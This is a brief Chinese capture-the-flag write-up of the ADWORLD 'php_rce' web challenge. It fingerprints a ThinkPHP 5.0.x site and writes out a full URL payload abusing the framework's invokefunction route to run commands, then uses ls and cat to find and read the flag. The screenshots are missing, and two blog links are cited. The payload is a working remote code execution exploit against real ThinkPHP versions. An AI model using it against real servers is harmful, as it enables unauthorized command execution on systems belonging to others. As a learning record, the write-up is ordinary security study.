ADWORLD web/php_rce

进入链接：

 

 thinkphp v5是一个php框架，在github 上搜索，得到如下版本

 

 随便选一个输入到url中，连接返回：

 

 说明版本是5.0.2，根据5.0.21版本构造payload，得到如下

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id

 

 继续，ls查看目录，无异常

 

 继续，访问上级目录，在第三层发现flag的身影：

 

 用cat访问flag

 

 

 

https://blog.csdn.net/phpergod/article/details/92841998

https://blog.csdn.net/Mr_helloword/article/details/107924218